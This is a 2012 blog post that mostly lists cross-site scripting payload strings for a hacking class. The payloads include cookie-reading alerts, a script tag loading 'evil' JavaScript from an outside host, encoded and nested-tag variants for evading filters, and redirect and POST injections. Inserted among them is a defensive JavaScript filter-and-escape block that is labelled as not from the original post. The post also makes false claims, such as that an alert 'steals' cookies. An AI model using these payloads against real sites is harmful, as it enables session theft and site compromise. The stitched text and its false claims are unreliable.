
Cross Site Scripting Notation Examples


[Figure: Cross Site Scripting (XSS) diagram: Stored XSS]

These were compiled in September of 2012 – if you are reading this way off in the future – you will want to go back and verify that these still work.

So what types of testing can you do for Cross Site Scripting? This is a quick collection of standard Cross Site Scripting Notation from around the internet, security blogs, security sites, and some of the more interesting underground web sites out there. These are just examples of the code that you can use to do cross site scripting.

<script>alert(document.cookie);</script> this will steal someone else’s cookie or otherwise access a cookie that you might not otherwise have access to.

<SCRIPT SRC=http://YourWebSite.com/YourEvilJavaScript.js></SCRIPT>  this will inject your JavaScript from a site you own or control, or from a JavaScript file you have successfully put on the web server you are cross site scripting. It is best to use their server for your evil script to take advantage of the system's trust. Your computer might not be trusted, and that would throw some interesting errors that the client might see.

<BODY BACKGROUND="javascript:alert('XSS')"> using the body background tag to inject a script into your vulnerable system.

<IFRAME SRC="javascript:alert('XSS');"></IFRAME> using an IFRAME as an injection possibility.

<body onload=alert('test')> loads the XSS using the body onload command.

<IMG SRC=j&#X41vascript:alert('test')> using an IMG tag to alert when the image loads.

<script>alert('Xss By Your Name here')</script> using a standard JavaScript alert notation.

SomePage.php?url=http://EvilHackerSite.com  simple redirect to a page of your choice

</script><script>alert%28document.cookie%29</script><script> nested script tags for evasion if you think the site you are looking at is protected by a Firewall or other security system

%22%3E%3Cscript%3Ealert%28%22http://st2tea.blogspot.com%22%29%3C/script%3E using UTF8 or other encoding for evasion processes.

POST: retURL=http%3A%2F%2Fwww.xssed.com%2F using a POST request to redirect to a different URL than intended.

POST: keywords=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&search.x=0&search.y=0 using POST to subvert the internal site search engine (all sites have a search feature unless they are horribly out of date).
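From the defending side, the encoded entries above show why a filter has to canonicalize input before matching, and why output encoding is the real fix. The sketch below is an added example, not code from the original post; the function names (naiveFilter, canonicalize, looksLikeXss, escapeHtml) and the pattern list are assumptions made for illustration.

```javascript
// Added example, not from the original post. Sample strings are copied from the list above.
const SAMPLES = [
  "<script>alert(document.cookie);</script>",
  "<IMG SRC=j&#X41vascript:alert('test')>",
  "<body onload=alert('test')>",
  "%22%3E%3Cscript%3Ealert%28%22http://st2tea.blogspot.com%22%29%3C/script%3E",
  "keywords=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&search.x=0&search.y=0",
];

// A filter that matches the raw request text only.
const naiveFilter = (s) => /<script/i.test(s);

const fromCode = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "");

// Undo percent-encoding and numeric HTML entities (with or without the trailing
// semicolon) until the value stops changing, capped at 5 rounds.
function canonicalize(input) {
  let prev;
  let cur = input;
  for (let i = 0; i < 5 && cur !== prev; i++) {
    prev = cur;
    try { cur = decodeURIComponent(cur); } catch (e) { /* malformed %XX: keep as is */ }
    cur = cur
      .replace(/&#x([0-9a-f]{1,6});?/gi, (_, h) => fromCode(parseInt(h, 16)))
      .replace(/&#(\d{1,7});?/g, (_, d) => fromCode(parseInt(d, 10)));
  }
  return cur;
}

// Constructs used by the listed strings: script/iframe tags, on* handlers, javascript: URIs.
const PATTERNS = [/<\s*(script|iframe)\b/i, /\bon[a-z]+\s*=/i, /javascript\s*:/i];

function looksLikeXss(input) {
  const c = canonicalize(input);
  return PATTERNS.some((re) => re.test(c));
}

// The actual fix is output encoding: escape before writing into HTML text or a
// quoted attribute. (It does not make an attacker-chosen URL in src/href safe.)
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (ch) => map[ch]);
}

for (const s of SAMPLES) {
  console.log(naiveFilter(s), looksLikeXss(s), escapeHtml(canonicalize(s)));
}
```

Only the first sample trips the raw-text filter; all five are flagged once canonicalized, and the escaped output renders as inert text.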

There are a lot of places out there that have a lot of very good examples. These were pulled from XSSED.com and Hackers.org and CGI-Security. These are being used in my Application Hacking class at Highline Community College, in a private network, with known vulnerable software. No system was compromised in the pursuit of this knowledge. Please don’t try this at home.

 

 

 
